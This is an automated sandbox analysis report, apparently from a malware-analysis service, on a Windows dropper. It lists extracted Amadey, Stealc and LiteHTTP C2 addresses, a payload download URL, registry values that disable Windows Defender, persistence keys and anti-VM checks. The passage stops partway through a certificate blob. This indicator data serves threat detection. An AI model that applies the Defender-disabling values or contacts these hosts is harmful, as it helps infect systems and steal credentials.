Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 20:59
Static task
static1
Behavioral task
behavioral1
Sample
3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe
Resource
win10v2004-20250217-en
General
-
Target
3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe
-
Size
938KB
-
MD5
1fa9c173c6abaae5709ca4b88db07aa5
-
SHA1
dc77a5b0aeede04510ad4604ff58af13fd377609
-
SHA256
3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247
-
SHA512
8bf7ea16e4ac88460842de1ab9abeeccb930d1bd309a8d06e2e33fab96cdd8a6f7a001dede7eedbe3511cba20e8799591e45a1a00bb484899bc255f3af811534
-
SSDEEP
24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:OTvC/MTQYxsWR7a09
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/1780-577-0x0000000000AD0000-0x0000000000F2E000-memory.dmp healer behavioral1/memory/1780-578-0x0000000000AD0000-0x0000000000F2E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" e45f20b736.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection e45f20b736.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e45f20b736.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" e45f20b736.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" e45f20b736.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" e45f20b736.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" e45f20b736.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e45f20b736.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications e45f20b736.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" e45f20b736.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e45f20b736.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aa693c20c2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eba65d1d30.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f831ef21a9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7ece595e42.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eeea2c0482.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2332 powershell.exe 11 2524 powershell.exe 16 2684 powershell.exe -
pid Process 2868 powershell.exe 2648 powershell.exe 1576 powershell.exe 2896 powershell.exe 1700 powershell.exe 1700 powershell.exe 2332 powershell.exe 2524 powershell.exe 2684 powershell.exe 3176 powershell.exe -
Downloads MZ/PE file 22 IoCs
flow pid Process 16 2684 powershell.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 7 2020 rapes.exe 20 2244 BitLockerToGo.exe 35 2548 BitLockerToGo.exe 4 2332 powershell.exe 11 2524 powershell.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000700000001a509-671.dat net_reactor behavioral1/memory/3944-679-0x0000000000300000-0x0000000000360000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aa693c20c2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e45f20b736.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7ece595e42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eba65d1d30.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f831ef21a9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7ece595e42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eeea2c0482.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e45f20b736.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aa693c20c2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eba65d1d30.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f831ef21a9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eeea2c0482.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe -
Executes dropped EXE 27 IoCs
pid Process 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 2020 rapes.exe 3016 zY9sqWs.exe 1864 51f7b9b684.exe 1300 TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE 2736 7ece595e42.exe 548 483d2fa8a0d53818306efeb32d3.exe 2328 d20f842ca5.exe 1272 d20f842ca5.exe 2956 aa693c20c2.exe 1740 eba65d1d30.exe 1004 PcAIvJ0.exe 2624 f831ef21a9.exe 1064 eeea2c0482.exe 1032 7093c1f919.exe 1780 e45f20b736.exe 3324 v6Oqdnc.exe 3620 MCxU5Fj.exe 3656 MCxU5Fj.exe 3848 ce4pMzk.exe 3944 mAtJWNv.exe 3988 mAtJWNv.exe 3996 mAtJWNv.exe 4004 mAtJWNv.exe 3276 SvhQA35.exe 3364 chromium.exe 3736 FvbuInU.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine aa693c20c2.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine eeea2c0482.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine e45f20b736.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine eba65d1d30.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine f831ef21a9.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 7ece595e42.exe -
Loads dropped DLL 64 IoCs
pid Process 2332 powershell.exe 2332 powershell.exe 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 2524 powershell.exe 2524 powershell.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2020 rapes.exe 2020 rapes.exe 2684 powershell.exe 2684 powershell.exe 2020 rapes.exe 2328 d20f842ca5.exe 2596 WerFault.exe 2596 WerFault.exe 2596 WerFault.exe 2596 WerFault.exe 2596 WerFault.exe 340 WerFault.exe 340 WerFault.exe 340 WerFault.exe 340 WerFault.exe 340 WerFault.exe 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 1616 WerFault.exe 1616 WerFault.exe 1616 WerFault.exe 2020 rapes.exe 2020 rapes.exe 2244 BitLockerToGo.exe 2020 rapes.exe 2020 rapes.exe 2020 rapes.exe 2548 BitLockerToGo.exe 2020 rapes.exe 2020 rapes.exe 3500 WerFault.exe 3500 WerFault.exe 3500 WerFault.exe 2020 rapes.exe 3620 MCxU5Fj.exe 3712 WerFault.exe 3712 WerFault.exe 3712 WerFault.exe 3712 WerFault.exe 3712 WerFault.exe 3784 WerFault.exe 3784 WerFault.exe 3784 WerFault.exe 3784 WerFault.exe 3784 WerFault.exe 2020 rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features e45f20b736.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e45f20b736.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\51f7b9b684.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106670101\\51f7b9b684.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106680121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\f831ef21a9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106780101\\f831ef21a9.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\eeea2c0482.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106790101\\eeea2c0482.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\7093c1f919.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106800101\\7093c1f919.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\e45f20b736.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106810101\\e45f20b736.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\zuuBU1dU\\Anubis.exe\"" ce4pMzk.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001961d-56.dat autoit_exe behavioral1/files/0x000500000001a4e6-413.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 2728 TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE 2020 rapes.exe 1300 TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE 2736 7ece595e42.exe 548 483d2fa8a0d53818306efeb32d3.exe 1740 eba65d1d30.exe 2624 f831ef21a9.exe 1064 eeea2c0482.exe 1780 e45f20b736.exe 3324 v6Oqdnc.exe 3736 FvbuInU.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2328 set thread context of 1272 2328 d20f842ca5.exe 67 PID 2736 set thread context of 2244 2736 7ece595e42.exe 70 PID 3620 set thread context of 3656 3620 MCxU5Fj.exe 112 PID 3944 set thread context of 4004 3944 mAtJWNv.exe 119 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 2540 3016 WerFault.exe 40 2596 2328 WerFault.exe 66 340 1272 WerFault.exe 67 1616 2624 WerFault.exe 82 3500 3324 WerFault.exe 109 3712 3620 WerFault.exe 111 3784 3656 WerFault.exe 112 4084 3944 WerFault.exe 116 -
System Location Discovery: System Language Discovery 1 TTPs 49 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 7093c1f919.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ece595e42.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f831ef21a9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7093c1f919.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 7093c1f919.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d20f842ca5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d20f842ca5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eba65d1d30.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aa693c20c2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eeea2c0482.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 51f7b9b684.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e45f20b736.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2056 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 1916 taskkill.exe 1936 taskkill.exe 1052 taskkill.exe 1504 taskkill.exe 3044 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a eba65d1d30.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f